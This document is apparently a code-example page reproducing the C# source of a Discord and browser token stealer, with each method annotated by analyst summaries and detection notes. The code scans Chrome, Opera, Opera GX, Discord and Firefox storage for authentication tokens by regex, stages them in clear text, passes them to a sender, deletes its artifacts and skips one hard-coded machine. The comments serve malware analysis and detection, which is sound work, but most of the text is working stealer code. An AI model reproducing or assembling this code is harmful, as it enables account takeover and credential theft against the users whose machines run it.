Пример #1
 /// <summary>
 /// Analyst summary: orchestrates this sample's collection pass. Reads
 /// HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid (64-bit registry view) and,
 /// unless it equals one hard-coded GUID, runs the five collectors, hands the
 /// staging file's text to <c>Stealer.Send</c>, then deletes the staging file.
 /// </summary>
 /// <remarks>
 /// <c>Stealer.Send</c> and the value of <c>Stealer._path</c> are not shown on this page,
 /// so neither the destination nor the staging location can be stated from here.
 /// Detection notes: the literal GUID below is a stable string indicator for this
 /// build. Reading MachineGuid is common in legitimate software and is not a useful
 /// signal by itself.
 /// </remarks>
 public static void StartSteal()
 {
     using (RegistryKey registryKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
     {
         using (RegistryKey registryKey2 = registryKey.OpenSubKey("SOFTWARE\\Microsoft\\Cryptography"))
         {
             // Host exclusion: nothing below runs on the one machine whose MachineGuid matches.
             // Presumably the author's own or a test host -- not confirmed by anything on this page.
             if (!(Convert.ToString(registryKey2.GetValue("MachineGuid")) == "90059c37-1320-41a4-b58d-2b75a9850d2f"))
             {
                 try
                 {
                     // Each collector writes its findings to the shared staging file (Stealer._path).
                     Stealer.StealTokenFromChrome();
                     Stealer.StealTokenFromOpera();
                     Stealer.StealTokenFromOperaGX();
                     Stealer.StealTokenFromDiscordApp();
                     Stealer.StealTokenFromFirefox();
                     // Entire staging file is read into memory and passed to Send in one call.
                     Stealer.Send(File.ReadAllText(Stealer._path));
                     // Staging file is removed after the send, so the on-disk artifact is short-lived;
                     // file create/delete telemetry is more useful to responders than a later disk scan.
                     if (File.Exists(Stealer._path))
                     {
                         File.Delete(Stealer._path);
                     }
                 }
                 catch (Exception)
                 {
                     // Empty handler: every failure is swallowed, so the process shows no error and logs nothing.
                 }
             }
         }
     }
 }
Пример #2
 /// <summary>
 /// Analyst summary: appends one labelled record for <paramref name="token"/> to the
 /// staging file (<c>Stealer._path</c>) and then calls <c>Stealer.RemoveDuplicatedLines</c>
 /// on that file. An empty string is ignored.
 /// </summary>
 /// <param name="token">Value to record; written verbatim between the label and the closing fence.</param>
 /// <returns>The <paramref name="token"/> argument, unchanged.</returns>
 /// <remarks>
 /// The label comes from static flags that the collectors set before calling the scanner.
 /// Detection notes: the fixed fragments " Token :: " and the triple-backtick labels are
 /// static strings usable in content signatures for the binary and for the staging file.
 /// The triple backticks look like Markdown code-fence markup, which would be consistent
 /// with the text being posted to a chat service -- presumed, the sender is not shown here.
 /// </remarks>
 private static string SaveTokens(string token)
 {
     if (!(token == ""))
     {
         string text = "";
         // Flags are tested in this fixed order; the first one that is set decides the label.
         if (Stealer.Chrome)
         {
             text = "```Chrome";
         }
         else if (Stealer.Opera)
         {
             text = "```Opera";
         }
         else if (Stealer.App)
         {
             text = "```Discord App";
         }
         else if (Stealer.OperaGX)
         {
             text = "```Opera GX";
         }
         else
         {
             // No flag set (Stealer.Firefox is not consulted in this method).
             text = "```Unknown";
         }
         text = text + " Token :: " + token + "```";
         // Credential material is written to disk in clear text at this point.
         File.AppendAllText(Stealer._path, text);
         Stealer.RemoveDuplicatedLines(Stealer._path);
     }
     return(token);
 }
Пример #3
 /// <summary>
 /// Analyst summary: program entry point. Sends the contents of a system-information file
 /// through an <c>API</c> object, deletes three files under C:/temp, calls
 /// <c>API.Passwords()</c> and <c>Stealer.StartSteal()</c>, then exits with code 0.
 /// </summary>
 /// <param name="args">Command-line arguments; not read anywhere in this method.</param>
 /// <remarks>
 /// The <c>API</c> type, <c>API.Hook</c>, <c>API.name</c> and <c>API.pfp</c> are not shown on this
 /// page; the name "Hook" suggests a webhook endpoint, but that is an inference to confirm.
 /// Host indicators visible here: C:/temp/System_INFO.txt, C:/temp/finalres.vbs and
 /// C:/temp/WebBrowserPassView.exe. The last file name matches NirSoft's WebBrowserPassView
 /// password-recovery utility. Nothing in this method creates these files, so an earlier
 /// stage presumably dropped them -- verify against the rest of the sample.
 /// </remarks>
 private static void Main(string[] args)
 {
     new API(API.Hook)
     {
         _name  = API.name,
         _ppUrl = API.pfp
     }.SendSysInfo("**SYSTEM INFO**", "C:/temp/System_INFO.txt");
     // Clean-up of staged artifacts: responders should expect these paths to be gone after a
     // run and rely on file-creation / process-creation telemetry instead.
     File.Delete("C:/temp/System_INFO.txt");
     File.Delete("C:/temp/finalres.vbs");
     File.Delete("C:/temp/WebBrowserPassView.exe");
     API.Passwords();
     Stealer.StartSteal();
     // Explicit exit: the process is short-lived and leaves no window or resident component here.
     Environment.Exit(0);
 }
Пример #4
        /// <summary>
        /// Analyst summary: if the Opera GX Local Storage LevelDB directory exists under the
        /// roaming AppData folder, sets the <c>Stealer.OperaGX</c> label flag and runs
        /// <c>Stealer.TokenStealer</c> over that directory with <c>checkLogs</c> = false.
        /// </summary>
        /// <remarks>
        /// Detection note: a process other than the browser itself opening files under
        /// "...\Opera Software\Opera GX Stable\Local Storage\leveldb\" is the observable
        /// behaviour; file-access auditing or EDR file-read events on that path cover it.
        /// </remarks>
        private static void StealTokenFromOperaGX()
        {
            string        path   = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\";
            DirectoryInfo folder = new DirectoryInfo(path);

            if (Directory.Exists(path))
            {
                // Flag is set before the scan so that SaveTokens labels records as "Opera GX".
                Stealer.OperaGX = true;
                List <string> list = Stealer.TokenStealer(folder, false);
                // The returned list is only inspected here; recording happens inside TokenStealer.
                if (list != null && list.Count > 0)
                {
                    Stealer.OperaGX = true;
                }
            }
        }
Пример #5
        /// <summary>
        /// Analyst summary: if the Chrome "Default" profile's Local Storage LevelDB directory
        /// exists under the local AppData folder, sets the <c>Stealer.Chrome</c> label flag and
        /// runs <c>Stealer.TokenStealer</c> over that directory with <c>checkLogs</c> = false.
        /// </summary>
        /// <remarks>
        /// Only the profile directory named "Default" is addressed by the path built here.
        /// Detection note: reads of "...\Google\Chrome\User Data\Default\Local Storage\leveldb\"
        /// by a process that is not the browser are the observable behaviour.
        /// </remarks>
        private static void StealTokenFromChrome()
        {
            string        path   = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\";
            DirectoryInfo folder = new DirectoryInfo(path);

            if (Directory.Exists(path))
            {
                // Flag is set before the scan so that SaveTokens labels records as "Chrome".
                Stealer.Chrome = true;
                List <string> list = Stealer.TokenStealer(folder, false);
                // The returned list is only inspected here; recording happens inside TokenStealer.
                if (list != null && list.Count > 0)
                {
                    Stealer.Chrome = true;
                }
            }
        }
Пример #6
        /// <summary>
        /// Analyst summary: searches every directory under the Firefox "Profiles" folder in
        /// roaming AppData for a file named webappsstore.sqlite, passes each containing
        /// directory to <c>Stealer.TokenStealerForFirefox</c>, and appends each returned value
        /// (after <c>Stealer.TokenCheckAcces</c>) to the staging file as a "Firefox Token: " line.
        /// </summary>
        /// <remarks>
        /// <c>TokenStealerForFirefox</c> and <c>TokenCheckAcces</c> are not shown on this page; what
        /// they read or contact cannot be stated from here.
        /// Detection notes: a recursive enumeration of the Profiles tree by a non-browser
        /// process, and the literal "Firefox Token: " in a file or binary, are the indicators
        /// visible in this method.
        /// </remarks>
        private static void StealTokenFromFirefox()
        {
            string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles\\";

            if (Directory.Exists(path))
            {
                // SearchOption.AllDirectories: every profile directory is covered, not one fixed profile.
                foreach (string text in Directory.EnumerateFiles(path, "webappsstore.sqlite", SearchOption.AllDirectories))
                {
                    // The file name is stripped from the path to obtain the profile directory.
                    List <string> list = Stealer.TokenStealerForFirefox(new DirectoryInfo(text.Replace("webappsstore.sqlite", "")), false);
                    if (list != null && list.Count > 0)
                    {
                        // Items are kept only while Stealer.App is false, then mapped through TokenCheckAcces.
                        foreach (string str in (from t in list
                                                where !Stealer.App
                                                select t).Select(new Func <string, string>(Stealer.TokenCheckAcces)))
                        {
                            Stealer.Firefox = true;
                            // Written directly to the staging file in clear text, bypassing SaveTokens.
                            File.AppendAllText(Stealer._path, "Firefox Token: " + str + Environment.NewLine);
                        }
                    }
                }
            }
        }
Пример #7
        /// <summary>
        /// Analyst summary: reads every "*.ldb" file (or "*.log" when <paramref name="checkLogs"/>
        /// is true) in <paramref name="Folder"/> as text, applies two regular expressions, and
        /// passes each match through <c>Stealer.TokenCheckAcces</c> to <c>Stealer.SaveTokens</c>.
        /// Clears all five browser/app label flags before returning.
        /// </summary>
        /// <param name="Folder">Directory whose files are scanned (top level only, per <c>GetFiles</c> with one pattern).</param>
        /// <param name="checkLogs">Selects the "*.log" pattern instead of "*.ldb".</param>
        /// <returns>
        /// The list created at the top of the method. Matches are not added to it; they leave
        /// this method only through <c>SaveTokens</c>, i.e. the staging file.
        /// </returns>
        /// <remarks>
        /// <c>TokenCheckAcces</c> is not shown on this page, so whether it contacts a remote
        /// service cannot be stated from here.
        /// Defender notes: the two patterns (three dot-separated segments of 24, 6 and 27
        /// characters, and "mfa." followed by 84 characters) match the shape of Discord
        /// authentication tokens, consistent with the "Discord App" label used elsewhere in the
        /// sample. The same patterns can be used defensively for secret scanning and as string
        /// indicators. If this code ran on a host, treat sessions of accounts logged in through
        /// the scanned browsers as exposed and revoke them by rotating credentials.
        /// </remarks>
        private static List <string> TokenStealer(DirectoryInfo Folder, bool checkLogs = false)
        {
            List <string> list = new List <string>();

            try
            {
                FileInfo[] files = Folder.GetFiles(checkLogs ? "*.log" : "*.ldb");
                for (int i = 0; i < files.Length; i++)
                {
                    // Whole file is read as text; LevelDB files are binary, so only ASCII-looking runs can match.
                    string input = files[i].OpenText().ReadToEnd();
                    foreach (object obj in Regex.Matches(input, @"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}"))
                    {
                        Stealer.SaveTokens(Stealer.TokenCheckAcces(((Match)obj).Value));
                    }
                    foreach (object obj2 in Regex.Matches(input, @"mfa\.[a-zA-Z0-9_\-]{84}"))
                    {
                        Stealer.SaveTokens(Stealer.TokenCheckAcces(((Match)obj2).Value));
                    }
                }
            }
            catch
            {
                // Bare catch: any exception from the scan is suppressed and nothing is logged.
            }
            list = list.Distinct <string>().ToList <string>();
            if (list.Count > 0)
            {
                Stealer.StealFound = true;
                List <string> list2 = list;
                int           index = list.Count - 1;
                // Replaces a null last element with an empty string.
                list2[index] = (list2[index] ?? "");
            }
            // Label flags are shared static state; they are cleared here so the next collector starts clean.
            Stealer.Firefox = false;
            Stealer.Opera   = false;
            Stealer.Chrome  = false;
            Stealer.App     = false;
            Stealer.OperaGX = false;
            return(list);
        }